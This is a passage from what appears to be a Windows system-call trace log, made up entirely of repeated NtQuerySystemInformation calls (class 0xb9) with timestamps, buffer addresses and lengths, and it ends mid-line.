[0281.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd18, Length=0x58, ResultLength=0x0) [0281.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0281.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x28, ResultLength=0x0) [0281.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0281.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0281.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x28, ResultLength=0x0) [0281.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x28, ResultLength=0x0) [0281.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0281.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0281.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0281.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x20, ResultLength=0x0) [0281.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0281.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0281.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0281.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0281.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0281.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0281.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0281.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0281.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0281.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0281.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0281.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0281.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd18, Length=0x58, ResultLength=0x0) [0281.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x58, ResultLength=0x0) [0281.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0281.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0281.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0281.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x58, ResultLength=0x0) [0281.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0281.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0281.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0281.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0281.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0281.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0281.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x58, ResultLength=0x0) [0281.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0281.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0281.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.587] NtQuerySystemInformation (SystemInformationClass=0xb9, 